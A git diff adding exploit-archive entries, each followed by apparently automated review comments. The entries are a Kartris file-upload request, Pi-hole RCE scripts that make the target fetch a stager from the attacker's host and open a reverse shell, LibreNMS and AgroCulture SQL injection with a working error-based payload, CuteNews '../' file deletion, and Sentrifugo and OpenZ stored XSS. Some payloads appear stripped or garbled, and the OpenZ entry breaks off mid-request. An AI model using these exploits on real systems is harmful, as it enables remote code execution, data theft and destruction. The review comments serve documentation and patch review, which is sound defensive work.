diff --git a/exploits/aspx/webapps/48445.txt b/exploits/aspx/webapps/48445.txt
new file mode 100644
index 000000000..d5ef619b2
--- /dev/null
+++ b/exploits/aspx/webapps/48445.txt
@@ -0,0 +1,111 @@
+# Exploit Title: Kartris 1.6 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2020-05-08
+# Exploit Author: Nhat Ha - Sun CSR
+# Vendor Homepage: https://www.cactusoft.com/
+# Software Link: https://www.kartris.com/
+# Version: 1.6
+# Category: Webapps
+# Tested on: WiN10_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: https://localhost/Admin/_GeneralFiles.aspx
+#
+POST /Admin/_GeneralFiles.aspx HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
+Firefox/76.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------9604487443072642880454762058
+Content-Length: 18484
+Origin: 192.168.1.1
+Connection: close
+Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx
+Cookie: __cfduid=d1e56d596943226c869a1186e06b8d8661588757096;
+ASP.NET_SessionId=abbnm4jh04wmdbl2gukr5t5w;
+KartrisBasket870c8=s=7i7lpj21819; KartrisBackAuth870c8=xxxxxxxxxxxxx
+Upgrade-Insecure-Requests: 1
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="scrManager_HiddenField"
+
+;;AjaxControlToolkit, Version=4.1.7.123, Culture=neutral,
+PublicKeyToken=28f01b0e84b6d53e:en-GB:57898466-f347-4e5c-9527-24f201596811:475a4ef5:5546a2b:d2e10b12:effe2a26:37e2e5c9:1d3ed089:751cdd15:dfad98a5:497ef277:a43b07eb:3cf12cf1;
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data;
+name="_UC_CategoryMenu_tvwCategory_ExpandState"
+
+cccccccccc
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data;
+name="_UC_CategoryMenu_tvwCategory_SelectedNode"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data;
+name="_UC_CategoryMenu_tvwCategory_PopulateLog"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$scrManager"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$_UC_AdminSearch$txtSearch"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$phdMain$hidFileNameToDelete"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$phdMain$filUploader";
+filename="malicious.aspx"
+Content-Type: text/plain
+
+[Content Malicious File Here ! ]
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$splMainPage$hdnWidth"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$splMainPage$hdnMinWidth"
+
+170px
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="ctl00$splMainPage$hdnMaxWidth"
+
+500px
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__EVENTTARGET"
+
+ctl00$phdMain$lnkUpload
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__EVENTARGUMENT"
+
+
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__VIEWSTATE"
+
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
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+54DD7DF0
+-----------------------------9604487443072642880454762058
+Content-Disposition: form-data; name="__VIEWSTATEENCRYPTED"
+
+
+-----------------------------9604487443072642880454762058--
+
+
+# Access malicious file following the link:
+https://localhost/uploads/General/malicious.aspx
+# How to fix: Update the latest version
+# Commit fix:
+https://github.com/cactusoft/kartris/commit/e9450dc1f90aa6167f1db1a6f137ea07cacb2a5c
\ No newline at end of file
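Review bot: The header states neither the privilege needed nor the release that carries the fix, and `# How to fix: Update the latest version` names no version. The request targets `/Admin/_GeneralFiles.aspx` and sends a `KartrisBackAuth870c8` cookie, which suggests an authenticated back-end session is required; I would add `# Privileges required: authenticated back-end user (inferred from the request)` and `# Fixed in: <FIXED_VERSION, confirm against the linked commit>`. For readers hardening an existing install, the capture shows `filename="malicious.aspx"` accepted with `Content-Type: text/plain` and then served from `/uploads/General/`. The controls worth naming beside the commit link are therefore an extension allow-list on upload and no script execution in the uploads directory.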
diff --git a/exploits/linux/webapps/48442.py b/exploits/linux/webapps/48442.py
new file mode 100755
index 000000000..e6bad5469
--- /dev/null
+++ b/exploits/linux/webapps/48442.py
@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+
+# Pi-hole <= 4.4 RCE
+# Author: Nick Frichette
+# Homepage: https://frichetten.com
+#
+# Note: This exploit must be run with root privileges and port 80 must not be occupied.
+# While it is possible to exploit this from a non standard port, for the sake of
+# simplicity (and not having to modify the payload) please run it with sudo privileges.
+# Or setup socat and route it through there?
+
+import requests
+import sys
+import socket
+import _thread
+import time
+
+if len(sys.argv) < 4:
+ print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port* *(Optional) root*")
+ print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
+ exit()
+
+SESSION = dict(PHPSESSID=sys.argv[1])
+TARGET_IP = sys.argv[2]
+LOCAL_IP = sys.argv[3]
+LOCAL_PORT = sys.argv[4]
+
+if len(sys.argv) == 6:
+ ROOT = True
+
+# Surpress https verify warnings
+# I'm asuming some instances will use self-signed certs
+requests.packages.urllib3.disable_warnings()
+
+# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
+payload = """
+""" %(LOCAL_IP, LOCAL_PORT)
+
+def send_response(thread_name):
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.bind((LOCAL_IP,int(80)))
+ sock.listen(5)
+
+ connected = False
+ while not connected:
+ conn,addr = sock.accept()
+ if thread_name == "T1":
+ print("[+] Received First Callback")
+ conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
+ else:
+ print("[+] Received Second Callback")
+ print("[+] Uploading Payload")
+ conn.sendall(bytes(payload, "utf-8"))
+ conn.close()
+ connected = True
+
+ sock.close()
+
+_thread.start_new_thread(send_response,("T1",))
+
+
+# Fetch token
+resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
+response = str(resp.content)
+token_loc = response.find("name=\"token\"")
+token = response[token_loc+20:token_loc+64]
+
+
+# Make request with token
+data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
+resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
+if resp.status_code == 200:
+ print("[+] Put Stager Success")
+
+
+# Update gravity
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+
+time.sleep(3)
+_thread.start_new_thread(send_response,("T2",))
+
+
+# Update again to trigger upload
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+print("[+] Triggering Exploit")
+try:
+ requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
+except:
+ # We should be silent to avoid filling the cli window
+ None
\ No newline at end of file
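Review bot: The guard `if len(sys.argv) < 4:` does not match the reads below it: `LOCAL_PORT = sys.argv[4]` needs five elements, so a four-element argv raises IndexError instead of printing the usage text; `if len(sys.argv) < 5:` matches what is read. The usage string advertises an optional `root` argument and the script sets `ROOT`, but nothing later in the file reads it, and the help text says "5 parameters" while listing four. The header also carries no CVE id or fixed release, unlike the `# CVE:` fields in the other entries of this commit; `# CVE: <CVE-ID>` and `# Fixed in: <FIXED_VERSION>` would let readers map the entry to a patch level. The same guard and the same missing header fields are in exploits/linux/webapps/48443.py.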
diff --git a/exploits/linux/webapps/48443.py b/exploits/linux/webapps/48443.py
new file mode 100755
index 000000000..51f4dc944
--- /dev/null
+++ b/exploits/linux/webapps/48443.py
@@ -0,0 +1,119 @@
+#!/usr/bin/env python3
+
+# Pi-hole <= 4.4 RCE
+# Author: Nick Frichette
+# Homepage: https://frichetten.com
+#
+# Note: This exploit must be run with root privileges and port 80 must not be occupied.
+# While it is possible to exploit this from a non standard port, for the sake of
+# simplicity (and not having to modify the payload) please run it with sudo privileges.
+# Or setup socat and route it through there?
+
+import requests
+import sys
+import socket
+import _thread
+import time
+
+if len(sys.argv) < 4:
+ print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*")
+ print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
+ exit()
+
+SESSION = dict(PHPSESSID=sys.argv[1])
+TARGET_IP = sys.argv[2]
+LOCAL_IP = sys.argv[3]
+LOCAL_PORT = sys.argv[4]
+
+# Surpress https verify warnings
+# I'm asuming some instances will use self-signed certs
+requests.packages.urllib3.disable_warnings()
+
+# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
+shell_payload = """
+""" %(LOCAL_IP, LOCAL_PORT)
+
+root_payload = """
+"""
+
+def send_response(thread_name):
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.bind((LOCAL_IP,int(80)))
+ sock.listen(5)
+
+ connected = False
+ while not connected:
+ conn,addr = sock.accept()
+ if thread_name == "T1":
+ print("[+] Received First Callback")
+ conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
+ elif thread_name == "T2":
+ print("[+] Received Second Callback")
+ print("[+] Uploading Root Payload")
+ conn.sendall(bytes(root_payload, "utf-8"))
+ elif thread_name == "T3":
+ print("[+] Received Third Callback")
+ conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
+ else:
+ print("[+] Received Fourth Callback")
+ print("[+] Uploading Shell Payload")
+ conn.sendall(bytes(shell_payload, "utf-8"))
+ conn.close()
+ connected = True
+
+ sock.close()
+
+_thread.start_new_thread(send_response,("T1",))
+
+
+# Fetch token
+resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
+response = str(resp.content)
+token_loc = response.find("name=\"token\"")
+token = response[token_loc+20:token_loc+64]
+
+
+# Make request with token
+data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
+resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
+if resp.status_code == 200:
+ print("[+] Put Root Stager Success")
+
+
+# Update gravity
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+time.sleep(3)
+_thread.start_new_thread(send_response,("T2",))
+
+
+# Update again to trigger upload of root redirect
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+time.sleep(1)
+_thread.start_new_thread(send_response,("T3",))
+
+data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o teleporter.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
+resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
+if resp.status_code == 200:
+ print("[+] Put Shell Stager Success")
+
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+time.sleep(1)
+_thread.start_new_thread(send_response,("T4",))
+
+resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
+
+
+print("[+] Triggering Exploit")
+try:
+ requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
+except:
+ # We should be silent to avoid filling the cli window
+ None
\ No newline at end of file
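Review bot: The header comment is copied unchanged from 48442.py, so nothing documents how this variant differs: `root_payload`, the second stager with `-o teleporter.php`, and the four-callback sequence in `send_response` have no explanation. I would add a header line for responders, for example `# Artifacts on target: fun.php and teleporter.php (presumably under /admin/scripts/pi-hole/php/), adlist entries containing a double quote and -o`. `teleporter.php` looks like the name of a file the product ships; if so the original is overwritten and has to be restored from the package, which the entry should say once confirmed. The bare `except:` at the end also hides every error, not only the expected timeout; `except requests.exceptions.RequestException:` would keep the intent.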
diff --git a/exploits/multiple/webapps/48453.txt b/exploits/multiple/webapps/48453.txt
new file mode 100644
index 000000000..f9b61877b
--- /dev/null
+++ b/exploits/multiple/webapps/48453.txt
@@ -0,0 +1,55 @@
+# Exploit Title: LibreNMS 1.46 - 'search' SQL Injection
+# Google Dork:unknown
+# Date: 2019-09-01
+# Exploit Author: Punt
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://www.librenms.org
+# Version:1.46 and less
+# Tested on:Linux and Windows
+# CVE: N/A
+
+#Affected Device: more than 4k found on Shodan and Censys.
+
+#Description about the bug
+Vunlerable script /html/ajax_serarch.php
+
+if (isset($_REQUEST['search'])) {
+ $search = mres($_REQUEST['search']);
+ header('Content-type: application/json');
+ if (strlen($search) > 0) {
+ $found = 0;
+
+ if ($_REQUEST['type'] == 'group') {
+ include_once '../includes/device-groups.inc.php';
+ foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) {
+ if ($_REQUEST['map']) {
+ $results[] = array(
+ 'name' => 'g:'.$group['name'],
+ 'group_id' => $group['id'],
+
+
+as you can there is a search parameter $search = mres($_REQUEST['search']); which accepts a user input using $_REQUEST['']
+
+dbFetchRows() used to exectute sql query
+
+now lets check the mres() function
+
+the mres() fuction is located under /includes/common.php
+
+function mres($string)
+{
+ return $string; //
+ global $database_link;
+ return mysqli_real_escape_string($database_link, $string);
+
+as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%'
+
+
+#POC:
+1st lgoin to your LibreNMS
+2nd go to this /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules
+3rd you will see an sql syntax error
+
+The Librenms team have applyed a patch .
+Thanks
+Punt (From Ethiopia)
\ No newline at end of file
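Review bot: The root-cause sentence, "calls the mysqli_real_escape_string() which can be bypassed by '%'", does not match the `mres()` body quoted just above it. That body returns on `return $string; //` before the `mysqli_real_escape_string()` call, so as quoted the escaping is never reached and `$search` goes into the `LIKE '%...%'` string unmodified. I would reword the sentence to say that `mres()` is a no-op in the affected version. The script is spelled `ajax_serarch.php` in the description and `ajax_search.php` in the PoC, and "have applyed a patch" names neither a release nor a commit, so `# Fixed in: <FIXED_VERSION>` is worth adding. For patch review the durable fix is bound parameters in the `dbFetchRows()` call rather than string concatenation, hedged because only this excerpt of the code is shown.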
diff --git a/exploits/php/webapps/48244.txt b/exploits/php/webapps/48244.txt
index 9edd4d31c..7122bec86 100644
--- a/exploits/php/webapps/48244.txt
+++ b/exploits/php/webapps/48244.txt
@@ -6,7 +6,7 @@
# Software Link: https://en.ulicms.de/current_versions.html
# Version: 2020.1
# Tested on: Windows
-# CVE : N/A
+# CVE : CVE-2020-12704
### Vulnerability : Stored Cross-Site Scripting
diff --git a/exploits/php/webapps/48250.txt b/exploits/php/webapps/48250.txt
index 01f7d3944..44d905674 100644
--- a/exploits/php/webapps/48250.txt
+++ b/exploits/php/webapps/48250.txt
@@ -7,7 +7,7 @@
https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php
# Version: 4.5.0
# Tested on: Windows
-# CVE : N/A
+# CVE : CVE-2020-12707
### Vulnerability : Persistent Cross-Site Scripting
diff --git a/exploits/php/webapps/48404.txt b/exploits/php/webapps/48404.txt
index 36428e78b..54a6f9ee3 100644
--- a/exploits/php/webapps/48404.txt
+++ b/exploits/php/webapps/48404.txt
@@ -6,7 +6,7 @@
# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30
# Version: 9.03.50
# Tested on: Windows
-# CVE : N/A
+# CVE : CVE-2020-12706
### Vulnerability : Persistent Cross-Site Scripting
diff --git a/exploits/php/webapps/48444.txt b/exploits/php/webapps/48444.txt
new file mode 100644
index 000000000..358753c78
--- /dev/null
+++ b/exploits/php/webapps/48444.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection
+# Date: 2020-05-06
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/farm_management_system_in_php_with_source_code.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: uname
+# Injected Request
+#Below request will print database name and MariaDB version.
+
+POST /fms/Login/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 204
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/fms/index.php
+Cookie: PHPSESSID=fiiiu7pq9kvhdr770ahd7dejco
+Upgrade-Insecure-Requests: 1
+
+uname=admin' OR (SELECT 1935 FROM(SELECT COUNT(*),CONCAT(database(),(SELECT (ELT(1935=1935,1))),0x3a,version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dqgD&pass=admin&category=1
+
+
+
+-----------------------------------------------------------------------------------------------------------------------------
+#Response
+HTTP/1.1 302 Found
+Date: Wed, 06 May 2020 13:21:36 GMT
+Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.5
+X-Powered-By: PHP/7.4.5
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: error.php
+Content-Length: 356
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+Warning: mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1' for key 'group_key' in
\ No newline at end of file
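Review bot: The entry gives no remediation and its header has no `# CVE:` field, which the other new entries in this commit carry. Two details in the capture matter to defenders and are not stated: the request goes to `/fms/Login/login.php`, the login form itself, and the data leaves through a `Warning: mysqli_query()` line echoed in the response body, so the disclosure depends on PHP errors being displayed to the client. I would add a closing line such as `# Mitigation: bind uname/pass as prepared-statement parameters; set display_errors off`. The response also stops at "for key 'group_key' in", so the capture looks truncated. The missing remediation also applies to exploits/php/webapps/48451.txt and 48452.txt.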
diff --git a/exploits/php/webapps/48446.txt b/exploits/php/webapps/48446.txt
new file mode 100644
index 000000000..4483f8ccf
--- /dev/null
+++ b/exploits/php/webapps/48446.txt
@@ -0,0 +1,148 @@
+# Exploit Title: Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting
+# Dork: N/A
+# Date: 2020-05-06
+# Exploit Author: Vulnerability-Lab
+# Vendor: http://www.sentrifugo.com/
+# Link: http://www.sentrifugo.com/download
+# Version: 3.2
+# Category: Webapps
+# CVE: N/A
+
+Document Title:
+===============
+Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2229
+
+
+Product & Service Introduction:
+===============================
+http://www.sentrifugo.com/
+http://www.sentrifugo.com/download
+
+
+Affected Product(s):
+====================
+Sentrifugo
+Product: Sentrifugo v3.2 - CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-05: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official Mahara v19.10.2 CMS web-application series.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `expense_name` parameters
+of the `/expenses/expenses/edit` module in the `index.php` file.
+Remote attackers with low privileges are able to inject own malicious
+persistent script code as expenses entry. The injected code can
+be used to attack the frontend or backend of the web-application. The
+request method to inject is POST and the attack vector is located
+on the application-side. Entries of expenses can be reviewed in the
+backend by higher privileged accounts as well.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] index.php/expenses/expenses/edit
+
+Vulnerable Input(s):
+[+] Expenses Name
+
+Vulnerable File(s):
+[+] index.php
+
+Vulnerable Parameter(s):
+[+] expense_name
+
+Affected Module(s):
+[+] index.php/expenses/expenses
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by low privileged web
+application user account with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+PoC: Vulnerable Source
+
+
+
+
+
+
+
+
+
+
+
+
+
+--- PoC Session Logs [POST] --- (Expenses Inject)
+http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
+Host: sentrifugo.localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 352
+Origin: http://sentrifugo.localhost:8080
+Connection: keep-alive
+Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
+Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87;
+_ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443
+id=&limit=&offset=¶meter=all¤cyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=&
+expense_name=&category_id=&project_id=&expense_date=&expense_currency_id=2&
+expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save
+-
+POST: HTTP/1.1 200 OK
+Server: Apache/2.2.22 (Ubuntu)
+X-Powered-By: PHP/5.3.10-1ubuntu3.10
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 19284
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+
+
+Reference(s):
+http://sentrifugo.localhost:8080/index.php
+http://sentrifugo.localhost:8080/index.php/expenses
+http://sentrifugo.localhost:8080/index.php/expenses/expenses/
+http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
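Review bot: The Technical Details paragraph names the wrong product, "the official Mahara v19.10.2 CMS web-application series", while the title and every other field say Sentrifugo v3.2. It reads as a paste from another advisory and should be `the official Sentrifugo v3.2 CMS web-application`. The "PoC: Vulnerable Source" heading is followed only by blank lines and `expense_name=` is empty in the session log, so the markup appears to have been stripped on import and the entry no longer shows where the value is rendered. The request body contains `¶meter=all¤cyid=1`, which looks like `&parameter` and `&currencyid` after an entity-decoding pass. No fix is listed; output-encoding `expense_name` where the expenses list is rendered is the control to name.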
diff --git a/exploits/php/webapps/48447.txt b/exploits/php/webapps/48447.txt
new file mode 100644
index 000000000..16134af4c
--- /dev/null
+++ b/exploits/php/webapps/48447.txt
@@ -0,0 +1,37 @@
+# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion
+# Date: 2020-05-08
+# Author: Besim ALTINOK
+# Vendor Homepage: https://cutephp.com
+# Software Link: https://cutephp.com/click.php?cutenews_latest
+# Version: v2.1.2 (Maybe it affect other versions)
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+# Remotely: Yes
+
+Description:
+------------------------------------------------------------------------
+In the "Media Manager" area, users can do arbitrarily file deletion.
+Because the developer did not use the unlink() function as secure. So, can
+be triggered this vulnerability by a low user account
+
+
+Arbitrary File Deletion PoC
+--------------------------------------------------------------------------------
+
+POST /cute/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 **********************************
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 222
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/cute/index.php
+Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022
+Upgrade-Insecure-Requests: 1
+
+mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete
\ No newline at end of file
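Review bot: The description does not name the root cause that the request itself shows: `rm%5B%5D=../avatar.png` carries a `../` segment, so the deletion target sits outside the media folder. "did not use the unlink() function as secure" could be replaced by a sentence saying the `rm[]` values are presumably passed to `unlink()` without being confined to the upload directory. The header has no `# CVE:` line or fixed version, and "Maybe it affect other versions" leaves the affected range open. A mitigation line would make the entry usable for patch review: resolve each name with `realpath()` and reject anything outside the media directory.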
diff --git a/exploits/php/webapps/48450.txt b/exploits/php/webapps/48450.txt
new file mode 100644
index 000000000..9f64de59e
--- /dev/null
+++ b/exploits/php/webapps/48450.txt
@@ -0,0 +1,192 @@
+# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
+# Date: 2020-05-11
+# Exploit Author: Vulnerability-Lab
+# Vendor: https://www.openz.de/
+# https://www.openz.de/download.html
+
+Document Title:
+===============
+OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2234
+
+
+Common Vulnerability Scoring System:
+====================================
+4.6
+
+
+Product & Service Introduction:
+===============================
+https://www.openz.de/
+https://www.openz.de/download.html
+
+
+Affected Product(s):
+====================
+OpenZ
+Product: OpenZ v3.6.60 - ERP (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-06: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent cross site scripting web vulnerability has been discovered
+in the official OpenZ v3.6.60 ERP web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `inpname` and
+`inpdescripción` parameters of the `Employee` add/register/edit
+module in the `menu.html` file. Remote attackers with low privileges are
+able to inject own malicious persistent script code as
+name or description. The injected code can be used to attack the
+frontend or backend of the web-application. The request method
+to inject is POST and the attack vector is located on the
+application-side. The attack can be triggered from low privilege user
+accounts against higher privilege user accounts like manager or
+administrators to elevate privileges via session hijacking.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Employee
+
+Vulnerable Input(s):
+[+] Mitarbeiter Name
+[+] Beschreibung
+
+Vulnerable File(s):
+[+] Menu.html
+
+Vulnerable Parameter(s):
+[+] inpname
+[+] inpdescription
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by low privileged web
+application user account with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the openz web-application
+2. Register, add or edit via profile settings the inpname &
+inpdescription parameter inputs
+3. Edit inpname & inpdescription parameter of the profile and save the entry
+Note: The execute occurs on preview of the user credentials in the
+/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
+4. Successful reproduce of the persistent web vulnerability!
+
+
+
+--- POC Session Logs [POST] --- (Inject via Add / Edit)
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
+Host: localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1464
+Origin: https://localhost:8080
+Connection: keep-alive
+Referer:
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
+Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
+_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
+Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=&
+inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=&
+inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=&
